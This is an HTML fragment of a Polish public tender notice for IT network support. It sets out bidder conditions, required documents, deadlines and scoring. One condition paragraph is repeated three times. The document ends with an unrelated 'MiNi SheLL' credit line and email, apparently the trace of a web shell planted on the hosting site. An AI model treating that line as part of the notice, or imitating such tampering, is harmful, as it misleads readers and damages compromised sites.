class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie<br/>ostatnich 5 (pięciu) lat przed upływem składania ofert, a jeśli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń<br/>okresowych lub ciągłych wykonuje należycie usługi, które łącznie spełniają<br/>następujące wymogi:<br/>1 usługę w zakresie usługi wsparcia lub opieki informatycznej przy utrzymaniu sieci dla<br/>konkretnego Zamawiającego (podmiot publiczny), przy czym minimalny czas trwania<br/>usługi to 24 miesiące.<br/>Uwaga:<br/>− Dla potrzeb oceny spełniania warunku nr 1 określonego w Rozdziale VI ust. 2 pkt 4)<br/>jeśli wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich,<br/>Zamawiający dokona przeliczenia tej wartości na złote polskie - na podstawie<br/>średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów<br/>Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w<br/>Dzienniku Urzędowym Unii Europejskiej. Jeżeli w dniu publikacji ogłoszenia o<br/>zamówieniu w Dzienniku Urzędowym Unii Europejskiej, Narodowy Bank Polski nie<br/>publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni<br/>kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu<br/>w Dzienniku Urzędowym Unii Europejskiej, w którym zostanie on opublikowany.<br/>− Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania usług<br/>bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>− W przypadku usług powtarzających się lub ciągłych nadal wykonywanych należy<br/>podać wartość dostaw zrealizowanych przed upływem terminu składania ofert.<br/>Referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wystawione w okresie ostatnich 3 miesięcy.<br/>− W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/ umowy<br/>większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres i<br/>wartość każdego zamówienia, o którym mowa powyżej. Warunek nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie<br/>ostatnich 5 (pięciu) lat przed upływem składania ofert, a jeśli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń<br/>okresowych lub ciągłych wykonuje należycie usługi, które łącznie spełniają<br/>następujące wymogi:<br/>1 usługę w zakresie usługi wsparcia lub opieki informatycznej przy utrzymaniu sieci dla<br/>konkretnego Zamawiającego (podmiot publiczny), przy czym minimalny czas trwania<br/>usługi to 24 miesiące.<br/>Uwaga:<br/>− Dla potrzeb oceny spełniania warunku nr 1 określonego w Rozdziale VI ust. 2 pkt 4)<br/>jeśli wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich,<br/>Zamawiający dokona przeliczenia tej wartości na złote polskie - na podstawie<br/>średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów<br/>Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w<br/>Dzienniku Urzędowym Unii Europejskiej. Jeżeli w dniu publikacji ogłoszenia o<br/>zamówieniu w Dzienniku Urzędowym Unii Europejskiej, Narodowy Bank Polski nie<br/>publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni<br/>kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu<br/>w Dzienniku Urzędowym Unii Europejskiej, w którym zostanie on opublikowany.<br/>− Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania usług<br/>bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>− W przypadku usług powtarzających się lub ciągłych nadal wykonywanych należy<br/>podać wartość dostaw zrealizowanych przed upływem terminu składania ofert.<br/>Referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wystawione w okresie ostatnich 3 miesięcy.<br/>− W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/ umowy<br/>większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres i<br/>wartość każdego zamówienia, o którym mowa powyżej.Warunek nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie<br/>ostatnich 5 (pięciu) lat przed upływem składania ofert, a jeśli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń<br/>okresowych lub ciągłych wykonuje należycie usługi, które łącznie spełniają<br/>następujące wymogi:<br/>1 usługę w zakresie usługi wsparcia lub opieki informatycznej przy utrzymaniu sieci dla<br/>konkretnego Zamawiającego (podmiot publiczny), przy czym minimalny czas trwania<br/>usługi to 24 miesiące.<br/>Uwaga:<br/>− Dla potrzeb oceny spełniania warunku nr 1 określonego w Rozdziale VI ust. 2 pkt 4)<br/>jeśli wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich,<br/>Zamawiający dokona przeliczenia tej wartości na złote polskie - na podstawie<br/>średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów<br/>Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w<br/>Dzienniku Urzędowym Unii Europejskiej. Jeżeli w dniu publikacji ogłoszenia o<br/>zamówieniu w Dzienniku Urzędowym Unii Europejskiej, Narodowy Bank Polski nie<br/>publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni<br/>kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu<br/>w Dzienniku Urzędowym Unii Europejskiej, w którym zostanie on opublikowany.<br/>− Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania usług<br/>bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>− W przypadku usług powtarzających się lub ciągłych nadal wykonywanych należy<br/>podać wartość dostaw zrealizowanych przed upływem terminu składania ofert.<br/>Referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wystawione w okresie ostatnich 3 miesięcy.<br/>− W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/ umowy<br/>większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres i<br/>wartość każdego zamówienia, o którym mowa powyżej. − Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz dotyczy usług, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających<br/>się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w<br/>zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia<br/>stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy<br/>wystawionych przez wykonawcę faktur.<br/>Warunek nr 2:<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje następującymi osobami do<br/>wykonania i realizacji zamówienia:<br/>co najmniej 2 osobami posiadającymi wykształcenie wyższe informatyczne – tj. tytuł<br/>zawodowy inżyniera, magistra lub magistra inżyniera uzyskany na kierunku informatyka<br/>lub kierunków pokrewnych takich jak: teleinformatyka, elektronika i telekomunikacja,<br/>cyberbezpieczeństwo, inżynieria systemów informatycznych lub innym kierunku, o ile<br/>program studiów obejmował zagadnienia z zakresu informatyki:<br/>w tym:<br/>a) co najmniej jedną osobą z dwóch realizującą obsługę sieci posiadającą wiedzę<br/>ekspercką potwierdzoną aktualnym certyfikatem:<br/>• CISCO (min. CCNA) lub<br/>• MikroTik (min. MTCNA) lub<br/>• CompTia Network+ lub<br/>• JuniperNetworks (min. JNCIA-Junos)<br/>b) co najmniej jedną osobą z dwóch, która posiada wiedzę z zakresu bezpieczeństwa<br/>sieciowego potwierdzoną certyfikatem Fortinet Network Security Expert – poziom co<br/>najmniej NSE 4 lub co najmniej Fortinet Certified Professional – Network Security, jako<br/>jego bezpośredni następca w aktualnej ścieżce certyfikacyjnej Fortinet)<br/>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się<br/>dysponowaniem 2 osobami do realizacji zamówienia. Każda osoba musi<br/>odrębnie spełniać ppkt. a) i b).<br/>W przypadku zaproponowania innego certyfikatu, niż wymienione w zapisach<br/>przedmiotowego warunku należy przez Wykonawcę skierować zapytanie<br/>odnośnie treści SWZ do Zamawiającego w ustawowym terminie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007<br/>r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r.. poz. 594 ), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej<br/>lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz usług, na spełnienie warunku nr 1, wykonanych, a w przypadku świadczeń<br/>powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane<br/>lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a<br/>w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 8 do SWZ;<br/>2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami stanowiący załącznik nr 9 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> brak <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (według załączonego wzoru – Załącznik nr 1 do SWZ).<br/>Wymagana forma:<br/>2) oświadczenie sankcyjne– w przypadku niniejszego postepowania oświadczenie<br/>sankcyjne jest zawarte w oświadczeniu na podstawie art. 125 ust. 1 ustawy Pzp.<br/>3) oświadczenie o podziale obowiązków w trakcie realizacji zamówienia Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (według załączonego wzoru –<br/>Załącznik nr 5 do SWZ) - jeżeli dotyczy<br/><br/>4) Zamawiający nie wymaga przedłożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.<br/>5) Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje) – jeżeli dotyczy;<br/>6) Pełnomocnictwo, z którego wynika prawo do podpisania oferty oraz do podpisania innych<br/>dokumentów składanych wraz z ofertą (jeżeli umocowanie osoby wskazanej w ofercie nie<br/>wynika z dokumentów rejestrowych KRS/CEIDG);<br/>7) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy<br/>– jeżeli dotyczy;<br/><br/>2. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do<br/>reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego/ podpisu<br/>zaufanego/ podpisu osobistego.<br/>Wymagana forma:<br/>Wymagane dokumenty muszą być złożone w pod rygorem nieważności, w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym, podpisem zaufanym.<br/>3. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233), które<br/>Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać zapisane i<br/>przekazane w osobnym pliku oznaczonym jako „Tajemnica przedsiębiorstwa”.<br/>Powyższe, zgodnie z §4 ust. 1 rozporządzenia w sprawie użycia środków komunikacji<br/>elektronicznej stanowi warunek utrzymania ich w poufności. Jeżeli Wykonawca nie<br/>dopełni tych obowiązków, Zamawiający będzie miał podstawę do uznania, że zastrzeżenie<br/>tajemnicy przedsiębiorstwa jest bezskuteczne i w związku z tym potraktuje daną<br/>informację, jako niepodlegającą ochronie i niestanowiącą tajemnicy przedsiębiorstwa<br/>w rozumieniu uznk.<br/>Zamawiający jednocześnie wyjaśnia, że Wykonawca zobowiązany jest wraz<br/>z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust.<br/>2 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby<br/>uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa stanowiło również<br/>odrębny plik, umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę<br/>tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane jako bezskuteczne<br/>ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu<br/>zachowania poufności objętych klauzulą informacji, zgodnie z postanowieniami art. 18 ust.<br/>3 ustawy.<br/>4. Wykonawca może złożyć tylko jedną ofertę.<br/>5. Treść oferty musi być zgodna z warunkami zamówienia (art. 226 ust 1 pkt 5).<br/>6. W przypadku, gdy Wykonawca dokona modyfikacji ww. wzorów formularzy, treść sporządzonej oferty, pod rygorem jej odrzucenia, musi zawierać wszystkie informacje wymagane w formularzach, o których mowa w ust. 6.<br/>7. Załącznik nr 6 SWZ - Zobowiązanie podmiotu udostępniająego zasoby jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Umocowanie musi wynikać z treści pełnomocnictwa złożonego wraz z ofertą w oryginale lub w<br/>formie notarialnie potwierdzonego odpisu, podpisanego kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2. Pełnomocnictwo o którym mowa w ust. 1 powinno zawierać w szczególności wskazanie:<br/>− postępowania o zamówienie publiczne, którego dotyczy;<br/>− wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby;<br/>− ustanowionego Pełnomocnika oraz zakresu jego umocowania. Zakres umocowania musi<br/>obejmować przede wszystkim: reprezentowanie Wykonawców występujących wspólnie w<br/>postępowaniu o udzielenie zamówienia publicznego, zaciąganie w ich imieniu zobowiązań,<br/>złożenie oferty wspólnie, prowadzenie korespondencji i podejmowanie zobowiązań związanych z<br/>postępowaniem o zamówienie publiczne.<br/>Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców ubiegających<br/>się wspólnie o udzielenie zamówienia, w tym pełnomocnika i przez osoby uprawnione do składania<br/>oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawcy.<br/>3. Wykonawcy działający w ramach spółki cywilnej zamiast pełnomocnictwa, o którym<br/>mowa w pkt 1, mogą załączyć do oferty odpis aktualnej umowy spółki, jeżeli będzie z niej<br/>wynikać zakres umocowania wspólników.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie<br/>wstępne składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie<br/>te potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w<br/>tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy<br/>kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument na<br/>podstawie art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>8. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego,<br/>umowy regulującej współpracę tych Wykonawców, zgodnie z art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Projektowanymi Postanowieniami Umowy - załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-11 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Sposób oceny oferty:<br/>a) Punkty przyznane za kryterium „Cena oferty brutto” liczone będą wg następującego<br/>wzoru:<br/>C = (CN : CB) × 60<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 60 pkt.<br/>b) Punkty przyznane za kryterium „Czas realizacji zgłoszenia krytycznego” liczone będą<br/>wg następującego wzoru:<br/>a) do 2 godzin - Wykonawca uzyska 25 pkt<br/>b) do 3 godzin - Wykonawca uzyska 20 pkt<br/>c) do 4 godzin - Wykonawca uzyska 15 pkt<br/>d) do 5 godzin - Wykonawca uzyska 5 pkt<br/>e) do 6 godzin – Wykonawca uzyska 0 pkt<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 25 pkt.<br/>c) Punkty przyznane za kryterium „Ilość godzin dodatkowych, bezpłatnych w miesiącu<br/>w ramach zdalnych prac konfiguracyjnych” liczone będą wg następującego wzoru:<br/>a) 20 godzin w miesiącu - Wykonawca uzyska 15 pkt<br/>b) 10 godzin w miesiącu - Wykonawca uzyska 10 pkt<br/>c) 5 godzin w miesiącu - Wykonawca uzyska 5 pkt<br/>d) 0 godzin w miesiącu - Wykonawca uzyska 0 pkt<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 15 pkt.<br/>UWAGA! Kryterium nr 2 i nr 3 dotyczy całej usługi, a nie elementów składowych w usłudze.<br/>Maksymalna możliwa liczba punktów do zdobycia jako suma wszystkich kryteriów wynosi 100 pkt.<br/>Zamawiający wykluczy Wykonawcę, jeżeli zachodzą przesłanki na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. poz. 835), tj. Wykonawców:<br/>- wymienionych w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>- których beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; - których jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37<br/>ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz.507) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł

Creat By MiNi SheLL
Email: jattceo@gmail.com